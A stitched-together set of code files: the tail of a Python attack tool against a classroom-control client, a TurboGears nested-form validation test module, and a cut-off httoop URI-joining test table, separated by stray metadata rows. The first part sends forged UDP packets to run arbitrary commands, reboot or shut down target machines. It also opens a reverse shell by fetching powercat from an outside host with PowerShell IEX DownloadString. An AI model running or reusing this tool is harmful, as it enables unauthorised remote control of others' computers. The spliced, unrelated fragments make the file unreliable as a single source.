0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]]
basicCMD = {
'-msg': store[0],
'-c': store[1],
'-r': store[2],
'-s': store[3],
}
header = """
------------------- Github Repositories -------------------
详细说明请看项目文档
https://github.com/ht0Ruial/Jiyu_udp_attack
"""
parser = argparse.ArgumentParser(header)
parser.add_argument('-ip', type=str, help="ip 指定目标IP地址")
parser.add_argument('-p', type=int, default=4705, help="port 指定监听端口,默认端口为4705")
parser.add_argument(
'-msg', type=str, help="send_message发送消息 eg: -msg \"HelloWord!\"")
parser.add_argument(
'-c', type=str, help="command命令 eg: -c \"cmd.exe /c ipconfig\"")
parser.add_argument('-l', type=int, default=1, help="循环次数,默认为1")
parser.add_argument('-t', type=int, default=22, help="循环时间间隔,默认是22秒")
parser.add_argument('-e', type=str, choices=['r', 's', 'g', 'nc', 'break', 'continue'],
help="Extra Options加载额外的选项 eg:-e r"
)
subparsers = parser.add_subparsers(help='-e 参数的详细说明')
subparsers.add_parser('r', help='reboot 重启')
subparsers.add_parser('s', help='shutdown 关机')
subparsers.add_parser('g', help='独立选项,获取当前的ip地址以及学生端监听的端口')
subparsers.add_parser('nc', help='独立选项,反弹shell的机器需出网,退出可使用命令exit')
subparsers.add_parser('break', help='独立选项,脱离屏幕控制,需要管理员权限')
subparsers.add_parser('continue', help='独立选项,恢复屏幕控制')
args = parser.parse_args()
# 格式化要发送的消息
def format_b4_send(content):
arr = []
for ch in content:
tmp = ''.join(list(map(lambda x: hex(ord(x)), ch)))
if int(tmp, 16) > 0xff:
tmp = tmp[2:]
high = int((tmp[0] + tmp[1]), 16)
low = int((tmp[2] + tmp[3]), 16)
arr.append(low)
arr.append(high)
else:
high = 0
low = int((tmp[2] + tmp[3]), 16)
arr.append(low)
arr.append(high)
return arr
# 获取ip
def get_ip(ip):
target_host = []
if ip.find('.') == -1:
print('\nYou enter a error IP.')
print("Please enter the correct format of the IP again.")
sys.exit(0)
if ip.find('-') != -1:
ip_arr = ip.split('-')
ip_arrs = ip_arr[0].split('.')
if int(ip_arr[1]) > 254:
ip_arr[1] = '254'
for i in range(int(ip_arrs[3]), int(ip_arr[1]) + 1):
ip_arrs[3] = str(i)
target_host.append('.'.join(ip_arrs))
elif ip.find('/') == -1:
target_host.append(ip)
elif ip.find('/24') != -1:
ip_arr = ip.split('/')
ip_arrs = ip_arr[0].split('.')
for i in range(1, 255):
ip_arrs[3] = str(i)
target_host.append('.'.join(ip_arrs))
else:
print('\nYou enter a error IP.')
print("Please enter the correct format of the IP again.")
sys.exit(0)
return target_host
# 将要发送的消息打包成完整的指令
def pkg_sendlist(cmdtype, content):
arrs = format_b4_send(content)
if cmdtype == '-msg':
index = 56
result = basicCMD['-msg']
for elem in arrs:
result[index] = elem
index += 1
elif cmdtype == '-c':
index = 578
result = basicCMD['-c']
for elem in arrs:
result[index] = elem
index += 1
return result
# 发送
def send(send_list):
if len(send_list) == 0:
print("[-] error 请使用 -h 以获取命令帮助")
sys.exit(0)
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
target_host = get_ip(args.ip)
for times in range(args.l):
for i in target_host:
for abc in send_list:
payload = pack("%dB" % (len(abc)), *abc)
client.sendto(payload, (i, args.p))
if args.l == 1:
print("发送成功")
sys.exit(0)
print("第%s次执行完毕" % str(times + 1))
if times != args.l - 1:
sleep(args.t)
def creat_send_object():
send_list = []
# 获取命令内容
if args.msg:
send_list.append(pkg_sendlist('-msg', args.msg))
if args.c:
send_list.append(pkg_sendlist('-c', args.c))
if args.e == 'r':
send_list.append(basicCMD['-r'])
if args.e == 's':
send_list.append(basicCMD['-s'])
return send_list
def single_command():
if args.e == 'g':
try:
hostname = socket.gethostname()
ip = socket.gethostbyname(hostname)
print("\nYour ip addres is:" + ip)
tasklist = popen("tasklist|find \"Student\"").read()
pattern = compile(r'[e]\s*\d{1,5}\s*[C]')
pid = (pattern.search(tasklist).group()[1:-1]).strip()
netstat = popen("netstat -ano |find \"{}\"".format(pid)).read()
pattern = compile(r"%s:\d{1,5}\s*[*]{1}" % ip)
netstat_pat = pattern.findall(netstat)
ports = [((i.strip(ip)[1:-1]).rstrip()) for i in netstat_pat]
print("\nYour student client possible ports are:" + ','.join(ports))
except:
pass
sys.exit(0)
elif args.e == 'break':
popen('sc config MpsSvc start= auto')
popen('net start MpsSvc')
popen('netsh advfirewall set allprofiles state on')
popen('netsh advfirewall firewall set rule name="StudentMain.exe" new action=block')
sleep(1)
system("cls")
sys.exit(0)
elif args.e == 'continue':
popen('netsh advfirewall firewall set rule name="StudentMain.exe" new action=allow')
sys.exit(0)
def netcat(num):
send_list = []
hostname = socket.gethostname()
ip = socket.gethostbyname(hostname)
cmd = "powershell IEX (New-Object System.Net.Webclient).DownloadString('https://xss.pt/hYvg');powercat -c {} -p {} -e cmd".format(
ip, num)
send_list.append(pkg_sendlist('-c', cmd))
send(send_list)
def run_from_cmd():
try:
single_command()
if args.e != 'nc':
send_list = creat_send_object()
send(send_list)
sys.exit(0)
num = random.randint(1, 65535)
pool = Pool(processes=1)
pool.apply_async(netcat, (num,))
print("listening on [any] {} ...".format(num))
system(
"powershell IEX (New-Object System.Net.Webclient).DownloadString('https://xss.pt/hYvg');powercat -l -p {}".format(
num))
pool.close()
pool.join()
except Exception as e:
print("[-] %s" % e)
if __name__ == '__main__':
run_from_cmd()
| 66.394805
| 134
| 0.61701
| 3,887
| 25,562
| 4.035503
| 0.089786
| 1.392324
| 2.058651
| 2.723448
| 0.793
| 0.788219
| 0.779676
| 0.772536
| 0.766416
| 0.762081
| 0
| 0.455734
| 0.221853
| 25,562
| 385
| 135
| 66.394805
| 0.332864
| 0.001565
| 0
| 0.527378
| 0
| 0.005764
| 0.05224
| 0.003841
| 0
| 0
| 0.474194
| 0
| 0
| 1
| 0.023055
| false
| 0.002882
| 0.025937
| 0
| 0.060519
| 0.0317
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
c4bbade26d073ae9d9453e4dd38ecbc1e9438941
| 13,857
|
py
|
Python
|
turbogears/widgets/tests/test_nested_widgets.py
|
timmartin19/turbogears
|
b5420cb7e55757d418d8fadb512dbd7803c4279c
|
[
"MIT"
] | null | null | null |
turbogears/widgets/tests/test_nested_widgets.py
|
timmartin19/turbogears
|
b5420cb7e55757d418d8fadb512dbd7803c4279c
|
[
"MIT"
] | 9
|
2015-01-27T19:13:56.000Z
|
2019-03-29T14:44:31.000Z
|
turbogears/widgets/tests/test_nested_widgets.py
|
timmartin19/turbogears
|
b5420cb7e55757d418d8fadb512dbd7803c4279c
|
[
"MIT"
] | 13
|
2015-04-14T14:15:53.000Z
|
2020-03-18T01:05:46.000Z
|
import re
import cherrypy
import turbogears.validators as validators
import turbogears.widgets as widgets
from turbogears.testutil import catch_validation_errors
from turbogears.widgets.meta import copy_schema
# Saved reference to the real cherrypy.request; swapped out by setup_module()
# and restored by teardown_module().
oldrequest = None
# Integer validator shared by all forms below: empty input converts to None.
int_validator = validators.Int(if_empty=None)
# Schema that validates only the 'age' key; missing keys are ignored rather
# than reported as errors, so tests can pass partial value dicts.
s_validator = validators.Schema(age=int_validator, ignore_key_missing=True)
class Request:
    """Minimal stand-in for ``cherrypy.request`` used while this module's
    tests run (installed by ``setup_module``)."""

    # Widgets record validation failures here; tests start with none.
    validation_errors = {}
def setup_module():
    """Install the fake Request as cherrypy.request for this test module,
    remembering the real one so teardown_module() can restore it."""
    global oldrequest
    oldrequest = cherrypy.request
    cherrypy.request = Request()
def teardown_module():
    """Restore the real cherrypy.request saved by setup_module()."""
    global oldrequest
    cherrypy.request = oldrequest
#XXX: We ignore missing keys to make passing value easier in tests
class TestSchema(validators.Schema):
    """Schema used by the nested forms below.

    Missing keys are ignored instead of raising, so tests may supply
    partial value dicts.
    """
    ignore_key_missing = True
class TestNestedWidgets:
    """Tests for widget-level validators attached to a three-level nested
    form (myform -> sub -> sub2), each level carrying a TestSchema."""

    form = widgets.TableForm(name = "myform", fields=[
        widgets.TextField("name"),
        widgets.TextField("age", validator=int_validator),
        widgets.FieldSet("sub", fields = [
            widgets.TextField("name"),
            widgets.TextField("age", validator=int_validator),
            widgets.FieldSet("sub2", fields = [
                widgets.TextField("name"),
                widgets.TextField("age",
                    validator=int_validator),
            ], validator = TestSchema()),
        ], validator = TestSchema()),
    ], validator = TestSchema())

    def test_display(self):
        """
        Checks if names of the widgets are set correctly depending on their
        path.
        """
        output = self.form.render(dict(sub=dict(sub2=dict(age=22))), format='xhtml')
        value_p = 'value="22"'
        name_p = 'name="sub.sub2.age"'
        # Attribute order inside the rendered tag is not guaranteed, so
        # accept value/name in either order.
        assert (re.compile('.*'.join([value_p, name_p])).search(output) or
                re.compile('.*'.join([name_p, value_p])).search(output))
        output = self.form.render(dict(sub=dict(age=22)), format='xhtml')
        value_p = 'value="22"'
        name_p = 'name="sub.age"'
        assert (re.compile('.*'.join([value_p, name_p])).search(output) or
                re.compile('.*'.join([name_p, value_p])).search(output))
        output = self.form.render(dict(sub=dict(age=22)), format='xhtml')
        id_p = 'id="myform_sub_age"'
        name_p = 'name="sub.age"'
        # NOTE(review): this assertion pairs id_p with the value_p left over
        # from the previous render while name_p is unused — looks like it was
        # meant to use name_p; confirm intent before changing.
        assert (re.compile('.*'.join([value_p, id_p])).search(output) or
                re.compile('.*'.join([id_p, value_p])).search(output))
        output = self.form.render(dict(age=22), format='xhtml')
        value_p = 'value="22"'
        name_p = 'name="age"'
        assert (re.compile('.*'.join([value_p, name_p])).search(output) or
                re.compile('.*'.join([name_p, value_p])).search(output))

    def test_validate_outermost(self):
        # A non-integer top-level age must produce exactly one error, on 'age'.
        values = dict(age="twenty")
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert errors.pop('age', False)
        assert not errors

    def test_validate_sub(self):
        # Bad age one level down: the error must appear under errors['sub'],
        # not at the top level.
        values = dict(sub=dict(age="twenty"))
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        # check the outermost dict is not poluted with errors from the inner
        # dicts
        assert not errors.has_key('age')
        errors = errors['sub']
        assert errors.pop('age', False)
        assert not errors

    def test_validate_sub2(self):
        # Bad age two levels down: error only under errors['sub']['sub2'].
        values = dict(sub=dict(sub2=dict(age="twenty")))
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert not errors.has_key('age')
        errors = errors['sub']
        print values, errors
        assert not errors.has_key('age')
        errors = errors['sub2']
        print values, errors
        assert errors.pop('age', False)
        assert not errors

    def test_validate_sub_and_sub2(self):
        # Bad ages at both nested levels: each level reports its own error.
        values = dict(sub=dict(age="fhg", sub2=dict(age="twenty")))
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert not errors.has_key('age')
        errors = errors['sub']
        print values, errors
        assert errors.pop('age', False)
        errors = errors['sub2']
        print values, errors
        assert errors.pop('age', False)
        assert not errors

    def test_good_values(self):
        # All-valid input yields no errors and converted values.
        values = dict(age=22, sub=dict(sub2=dict(age=20)))
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert errors == {}
        assert values['age'] == 22

    def test_good_and_bad_values(self):
        # Only the invalid top-level age errors; valid nested values do not.
        values = dict(age="ddd", sub=dict(age="20", sub2=dict()))
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert errors.pop('age', False)
        assert not errors
        #assert values['sub']['age'] == 20
class TestNestedWidgetsWSchemaValidation:
    """Same nesting as TestNestedWidgets, but validation is done by a
    Schema (s_validator) attached to each form/fieldset level rather than
    by per-widget validators."""

    form = widgets.TableForm(
        name = "myform",
        validator = s_validator,
        fields=[
            widgets.TextField("name"),
            widgets.TextField("age"),
            widgets.FieldSet(
                name = "sub",
                validator = s_validator,
                fields = [
                    widgets.TextField("name"),
                    widgets.TextField("age"),
                    widgets.FieldSet(
                        name = "sub2",
                        validator = s_validator,
                        fields = [
                            widgets.TextField("name"),
                            widgets.TextField("age"),
                        ]
                    ),
                ]
            ),
        ]
    )

    def test_validate_sub_schema(self):
        # Bad age one level down: error must land under errors['sub'] only.
        values = dict(sub=dict(age="twenty"))
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        # check the outermost dict is not poluted with errors from the inner
        # dicts
        assert not errors.has_key('age')
        errors = errors['sub']
        assert errors.pop('age', False)
        assert not errors

    def test_good_and_bad_values_schema(self):
        # Only the invalid top-level age errors; valid nested values pass.
        values = dict(age="ddd", sub=dict(age="20", sub2=dict()))
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert errors.pop('age', False)
        assert not errors
        #assert values['sub']['age'] == 20

    def test_good_values_schema(self):
        # All-valid input yields no errors and converted values.
        values = dict(age=22, sub=dict(sub2=dict(age=20)))
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert errors == {}
        assert values['age'] == 22

    def test_validate_sub_and_sub2_schema(self):
        # Bad ages at both nested levels: each level reports its own error.
        values = dict(sub=dict(age="fhg", sub2=dict(age="twenty")))
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert not errors.has_key('age')
        errors = errors['sub']
        print values, errors
        assert errors.pop('age', False)
        errors = errors['sub2']
        print values, errors
        assert errors.pop('age', False)
        assert not errors

    def test_validate_sub2_schema(self):
        # Bad age two levels down: error only under errors['sub']['sub2'].
        values = dict(sub=dict(sub2=dict(age="twenty")))
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert not errors.has_key('age')
        errors = errors['sub']
        print values, errors
        assert not errors.has_key('age')
        errors = errors['sub2']
        print values, errors
        assert errors.pop('age', False)

    def test_validate_outermost_schema(self):
        # A non-integer top-level age must produce exactly one error.
        values = dict(age="twenty")
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert errors.pop('age', False)
        assert not errors
        # NOTE(review): duplicated assertion below, harmless but redundant.
        assert not errors
class TestNestedWidgetsWMixedValidation:
    """Mixes schema validation (s_validator on the outer levels) with
    per-widget validators (int_validator on the 'number' fields and on the
    innermost 'age')."""

    form = widgets.TableForm(
        name = "myform",
        validator = s_validator,
        fields=[
            widgets.TextField("name"),
            widgets.TextField("age"),
            widgets.TextField("number", validator=int_validator),
            widgets.FieldSet(
                name = "sub",
                validator = s_validator,
                fields = [
                    widgets.TextField("name"),
                    widgets.TextField("age"),
                    widgets.TextField("number", validator=int_validator),
                    widgets.FieldSet(
                        name = "sub2",
                        fields = [
                            widgets.TextField("name"),
                            widgets.TextField("age", validator=int_validator),
                            widgets.TextField("number", validator=int_validator),
                        ]
                    ),
                ]
            ),
        ]
    )

    def test_mixed_validators(self):
        """
        Tests that schema validators and single validators can be mixed
        safely.
        """
        values = dict(
            age="bad",
            number="22",
            sub=dict(
                age="bad",
                number="bad",
                sub2=dict(
                    age="bad",
                    number="bad",
                )
            )
        )
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert errors.pop('age', False)
        #assert values['number'] == 22
        # assert errors are not getting poluted errors from other levels of
        # the tree
        assert errors.keys() == ['sub']
        errors = errors['sub']
        assert errors.pop('age', False)
        assert errors.pop('number', False)
        assert errors.keys() == ['sub2']
        errors = errors['sub2']
        assert errors.pop('age', False)
        assert errors.pop('number', False)
        assert not errors
class InnerSchema(validators.Schema):
    # Schema for the innermost "sub2" fieldset: only 'age' is validated;
    # keys missing from the input are tolerated.
    ignore_key_missing = True
    age = int_validator
class MiddleSchema(validators.Schema):
    # Schema for the "sub" fieldset: validates its own 'age' and
    # delegates the nested 'sub2' mapping to InnerSchema.
    ignore_key_missing = True
    age = int_validator
    sub2 = InnerSchema()
class OuterSchema(validators.Schema):
    # Top-level schema: validates the form's 'age' and delegates the
    # nested 'sub' mapping to MiddleSchema.
    ignore_key_missing = True
    age = int_validator
    sub = MiddleSchema()
class TestNestedSchemaValidators:
    #XXX: Age is always validated by the nested schemas, number is
    # validated with widget validator.
    form = widgets.TableForm(
        name = "myform",
        validator = OuterSchema(),
        fields=[
            widgets.TextField("age"),
            widgets.TextField("number", validator=int_validator),
            widgets.FieldSet(
                name = "sub",
                fields = [
                    widgets.TextField("age"),
                    widgets.TextField("number", validator=int_validator),
                    widgets.FieldSet(
                        name = "sub2",
                        fields = [
                            widgets.TextField("age"),
                            widgets.TextField("number", validator=int_validator),
                        ]
                    ),
                ]
            ),
        ]
    )

    def test_nested_schemas(self):
        """
        Tests that we can nest schema validators safely.
        """
        values = dict(
            age="bad",
            number="22",
            sub=dict(
                age="27",
                number="bad",
                sub2=dict(
                    age="bad",
                    number="bad",
                )
            )
        )
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert errors.pop('age', False)
        #assert values['number'] == 22
        # assert errors are not getting polluted with errors from other
        # levels of the tree
        # (Python 2: dict.keys() returns a list, so == comparison works)
        assert errors.keys() == ['sub']
        errors = errors['sub']
        values = values['sub']
        #XXX This assertion fails :(
        #XXX But it's normal as the Schema doesn't convert good values in
        # invalid Schemas, ATM
        #assert values['age'] == 27
        assert errors.pop('number', False)
        assert errors.keys() == ['sub2']
        errors = errors['sub2']
        assert errors.pop('age', False)
        assert errors.pop('number', False)
        assert not errors

    def test_nested_schemas_good_values(self):
        # All-valid input: no errors, and every value is converted to int
        # at every nesting level.
        values = dict(
            age="21",
            number="22",
            sub=dict(
                age="27",
                number="28",
                sub2=dict(
                    age="33",
                    number="34",
                )
            )
        )
        values, errors = catch_validation_errors(self.form, values)
        print values, errors
        assert not errors
        assert (values["age"], values['number']) == (21, 22)
        values = values['sub']
        assert (values["age"], values['number']) == (27, 28)
        values = values['sub2']
        assert (values["age"], values['number']) == (33, 34)
def test_copy_schema():
    """A flat validator schema must survive copy_schema() unharmed."""
    class UserSchema(validators.Schema):
        user_name = validators.PlainText()

    original = UserSchema()
    copied = copy_schema(original)
def test_copy_nested_schema():
    """A schema with nested sub-schemas must survive copy_schema()."""
    # Nested class names double as the schema's field names, so they are
    # part of the schema's contract and stay as-is.
    class PersonSchema(validators.Schema):
        class namefields(validators.Schema):
            firstname = validators.PlainText()
            lastname = validators.PlainText()

        class parents(validators.Schema):
            class father(validators.Schema):
                firstname = validators.PlainText()
                lastname = validators.PlainText()

            class mother(validators.Schema):
                firstname = validators.PlainText()
                lastname = validators.PlainText()

    original = PersonSchema()
    copied = copy_schema(original)
| 30.189542
| 84
| 0.554305
| 1,442
| 13,857
| 5.217753
| 0.108183
| 0.060606
| 0.051967
| 0.064195
| 0.790936
| 0.764221
| 0.73126
| 0.716773
| 0.700691
| 0.660154
| 0
| 0.010902
| 0.331457
| 13,857
| 458
| 85
| 30.255459
| 0.801274
| 0.052248
| 0
| 0.708207
| 0
| 0
| 0.048315
| 0
| 0
| 0
| 0
| 0
| 0.173252
| 0
| null | null | 0
| 0.018237
| null | null | 0.069909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f20613ac931f56423a1ac558f26047bfad5c9379
| 6,742
|
py
|
Python
|
tests/uri/test_uri_joining.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 13
|
2015-01-07T19:39:02.000Z
|
2021-07-12T21:09:28.000Z
|
tests/uri/test_uri_joining.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 9
|
2015-06-14T11:37:26.000Z
|
2020-12-11T09:12:30.000Z
|
tests/uri/test_uri_joining.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 10
|
2015-05-28T05:51:46.000Z
|
2021-12-29T20:36:15.000Z
|
from __future__ import unicode_literals
import pytest
from httoop import URI
# Base URIs used by the reference-resolution tables below, one per RFC
# whose examples are exercised, plus a fragment-free simple base.
RFC1808_BASE = b'http://a/b/c/d;p?q#f'
RFC2396_BASE = b'http://a/b/c/d;p?q'
RFC3986_BASE = b'http://a/b/c/d;p?q'
SIMPLE_BASE = b'http://a/b/c/d'
# Test table: base URI -> list of (relative reference, expected absolute
# URI after joining). Cases are taken from the worked examples in
# RFC 3986, RFC 2396 and RFC 1808, plus a few project-specific ones.
uri_join = {
    RFC3986_BASE: [
        # RFC 3986 Normal examples
        (b'g:h', b'g:h'),
        (b'g', b'http://a/b/c/g'),
        (b'./g', b'http://a/b/c/g'),
        (b'g/', b'http://a/b/c/g/'),
        (b'/g', b'http://a/g'),
        (b'//g', b'http://g'),
        (b'?y', b'http://a/b/c/d;p?y'),
        (b'g?y', b'http://a/b/c/g?y'),
        (b'#s', b'http://a/b/c/d;p?q#s'),
        (b'g#s', b'http://a/b/c/g#s'),
        (b'g?y#s', b'http://a/b/c/g?y#s'),
        (b';x', b'http://a/b/c/;x'),
        (b'g;x', b'http://a/b/c/g;x'),
        (b'g;x?y#s', b'http://a/b/c/g;x?y#s'),
        (b'', b'http://a/b/c/d;p?q'),
        (b'.', b'http://a/b/c/'),
        (b'./', b'http://a/b/c/'),
        (b'..', b'http://a/b/'),
        (b'../', b'http://a/b/'),
        (b'../g', b'http://a/b/g'),
        (b'../..', b'http://a/'),
        (b'../../', b'http://a/'),
        (b'../../g', b'http://a/g'),
        # RFC 3986 abnormal examples
        (b'../../../g', b'http://a/g'),
        (b'../../../../g', b'http://a/g'),
        (b'/./g', b'http://a/g'),
        (b'/../g', b'http://a/g'),
        (b'g.', b'http://a/b/c/g.'),
        (b'.g', b'http://a/b/c/.g'),
        (b'g..', b'http://a/b/c/g..'),
        (b'..g', b'http://a/b/c/..g'),
        (b'./../g', b'http://a/b/g'),
        (b'./g/.', b'http://a/b/c/g/'),
        (b'g/./h', b'http://a/b/c/g/h'),
        (b'g/../h', b'http://a/b/c/h'),
        (b'g;x=1/./y', b'http://a/b/c/g;x=1/y'),
        (b'g;x=1/../y', b'http://a/b/c/y'),
        (b'g?y/./x', b'http://a/b/c/g?y/./x'),
        (b'g?y/../x', b'http://a/b/c/g?y/../x'),
        (b'g#s/./x', b'http://a/b/c/g#s/./x'),
        (b'g#s/../x', b'http://a/b/c/g#s/../x'),
        (b'http:g', b'http:g'),
        # own examples
        (b'//', b'http://a/b/c/d;p?q'),
        (b'g%3ah', b'http://a/b/c/g:h'),
    ],
    SIMPLE_BASE: [
        (b'g:h', b'g:h'),
        #(b'http:g', b'http://a/b/c/g'),
        #(b'http:', b'http://a/b/c/d'),
        (b'g', b'http://a/b/c/g'),
        (b'./g', b'http://a/b/c/g'),
        (b'g/', b'http://a/b/c/g/'),
        (b'/g', b'http://a/g'),
        (b'//g', b'http://g'),
        (b'?y', b'http://a/b/c/d?y'),
        (b'g?y', b'http://a/b/c/g?y'),
        (b'g?y/./x', b'http://a/b/c/g?y/./x'),
        (b'.', b'http://a/b/c/'),
        (b'./', b'http://a/b/c/'),
        (b'..', b'http://a/b/'),
        (b'../', b'http://a/b/'),
        (b'../g', b'http://a/b/g'),
        (b'../..', b'http://a/'),
        (b'../../g', b'http://a/g'),
        (b'./../g', b'http://a/b/g'),
        (b'./g/.', b'http://a/b/c/g/'),
        (b'g/./h', b'http://a/b/c/g/h'),
        (b'g/../h', b'http://a/b/c/h'),
        #(b'http:g', b'http://a/b/c/g'),
        #(b'http:', b'http://a/b/c/d'),
        #(b'http:?y', b'http://a/b/c/d?y'),
        #(b'http:g?y', b'http://a/b/c/g?y'),
        #(b'http:g?y/./x', b'http://a/b/c/g?y/./x'),
    ],
    RFC2396_BASE: [
        (b'g:h', b'g:h'),
        (b'g', b'http://a/b/c/g'),
        (b'./g', b'http://a/b/c/g'),
        (b'g/', b'http://a/b/c/g/'),
        (b'/g', b'http://a/g'),
        (b'//g', b'http://g'),
        (b'g?y', b'http://a/b/c/g?y'),
        (b'#s', b'http://a/b/c/d;p?q#s'),
        (b'g#s', b'http://a/b/c/g#s'),
        (b'g?y#s', b'http://a/b/c/g?y#s'),
        (b'g;x', b'http://a/b/c/g;x'),
        (b'g;x?y#s', b'http://a/b/c/g;x?y#s'),
        (b'.', b'http://a/b/c/'),
        (b'./', b'http://a/b/c/'),
        (b'..', b'http://a/b/'),
        (b'../', b'http://a/b/'),
        (b'../g', b'http://a/b/g'),
        (b'../..', b'http://a/'),
        (b'../../', b'http://a/'),
        (b'../../g', b'http://a/g'),
        (b'', RFC2396_BASE),
        (b'g.', b'http://a/b/c/g.'),
        (b'.g', b'http://a/b/c/.g'),
        (b'g..', b'http://a/b/c/g..'),
        (b'..g', b'http://a/b/c/..g'),
        (b'./../g', b'http://a/b/g'),
        (b'./g/.', b'http://a/b/c/g/'),
        (b'g/./h', b'http://a/b/c/g/h'),
        (b'g/../h', b'http://a/b/c/h'),
        (b'g;x=1/./y', b'http://a/b/c/g;x=1/y'),
        (b'g;x=1/../y', b'http://a/b/c/y'),
        (b'g?y/./x', b'http://a/b/c/g?y/./x'),
        (b'g?y/../x', b'http://a/b/c/g?y/../x'),
        (b'g#s/./x', b'http://a/b/c/g#s/./x'),
        (b'g#s/../x', b'http://a/b/c/g#s/../x'),
    ],
    # "normal" cases from RFC 1808:
    RFC1808_BASE: [
        (b'g:h', b'g:h'),
        (b'g', b'http://a/b/c/g'),
